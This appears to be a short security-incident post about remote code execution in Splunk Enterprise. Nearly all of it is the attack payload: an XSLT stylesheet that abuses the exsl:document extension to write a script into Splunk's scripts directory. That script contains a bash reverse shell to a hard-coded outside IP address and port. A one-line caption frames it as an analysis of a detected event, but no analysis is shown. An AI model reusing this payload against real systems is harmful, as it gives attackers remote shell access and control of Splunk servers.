




<?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl"> <xsl:template match="/"> <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text"> <xsl:text>sh -i >& /dev/tcp/180.101.88.240/1923 0>&1</xsl:text> </exsl:document> </xsl:template></xsl:stylesheet>





Posted Dec 3, 2023
Security event indicating Remote Code Execution Detected in Splunk Enterprise. This report outlines the analysis, investigation, and mitigation taken.